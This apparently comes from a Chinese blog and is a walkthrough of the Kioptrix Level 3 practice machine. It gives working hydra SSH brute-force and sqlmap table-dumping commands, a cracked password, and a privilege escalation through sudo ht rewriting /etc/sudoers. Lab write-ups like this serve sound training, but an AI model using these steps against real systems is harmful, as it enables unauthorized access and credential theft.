OSCP(基础篇靶机Kioptrix Level 3)

第一步:nmap与dirb

第二步:发现  Proudly Powered by: LotusCMS框架,尝试是否存在漏洞利用(失败)

 漏洞分析与利用:https://www.youtube.com/watch?v=ZsQP94HHfeY

该模块利用了 Lotus CMS 3.0 的 Router() 函数中发现的漏洞。这是通过在“page”参数中嵌入 PHP 代码来完成的,该参数将被传递给 eval 调用,从而允许远程代码执行。

 我直接利用msf,以失败告终

 第三步,继续收集线索,发现疑似用户loneferret,可以尝试hydra暴力破解(看运气)

hydra用法: https://zhuanlan.zhihu.com/p/397779150

试一下kali自带的目录字典

 sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

sudo  hydra -e nsr -l loneferret -P /usr/share/wordlists/rockyou.txt 192.168.56.104 ssh -t 4

root@kali:~# hydra -e nsr -l loneferret -P /root/Desktop/wordlists/10_million_password_list_top_100000.txt 192.168.1.70 ssh -t 4
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-12-21 23:02:32
[DATA] max 4 tasks per 1 server, overall 64 tasks, 100003 login tries (l:1/p:100003), ~390 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.70 login: loneferret password: starwars
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-12-21 23:03:27

 

第三步:续集SQL注入、SQLMAP获取到用户名密码

获取页面乱码,改一下hosts文件看看

kioptrix3.com    192.168.56.104

 

 去找下拉框找到:http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos(下拉框找SQL注入漏洞)

kioptrix3.com/gallery/gallery.php?id=1 直接也可访问

 

第四步:打开burp,把报文信息提取出来sqli1(复制到文件)

进入kali ,vi sqli1进行查看确认

 

https://www.freebuf.com/sectool/164608.html ---sqlmap用法
--------------------------------------------------------------------------
sqlmap -r sqli1 --risk=3 --level=5 -D gallery --tables --batch ---得到gallery数据库的表

------------------------------------------------------------------------------
sqlmap -r sqli1 --risk=3 --level=5 -D gallery -T dev_accounts --dump --batch ----得到dev_accounts中的用户名密码

 

第五步:ssh连接loneferret用户,获取到CompanyPolicy.README线索

┌──(kali㉿kali)-[~]
└─$ ssh loneferret@192.168.56.104
Unable to negotiate with 192.168.56.104 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

┌──(kali㉿kali)-[~]
└─$ ssh loneferret@192.168.56.104 -oHostKeyAlgorithms=+ssh-dss

 查看文件发现线索提示sudo ht

 

第六步:通过sudo ht越权到root

Question...

I am using lxterminal to connect to a telnet session on another *nix box.

After I connect, I always have to enter the command
Code:
export TERM=xterm

 sudo ht

Alt=F   open /etc/sudoers ------------------编辑sudoers权限
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht

我们可以简单地用空格替换 “!”(0x20),因此运行 /usr/bin/su 会给我们一个根。

loneferret@Kioptrix3:~$ sudo /usr/bin/su
[sudo] password for loneferret:
sudo: /usr/bin/su: command not found
loneferret@Kioptrix3:~$ which su
/bin/su
哦,难怪它不起作用。su是在/bin/su,而不是 /usr/bin/su

loneferret ALL=NOPASSWD: /bin/su, /usr/local/bin/ht
loneferret@Kioptrix3:~$ sudo /bin/su

 

完结撒花~

 

posted @   justdoIT*  阅读(113)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】
点击右上角即可分享
微信分享提示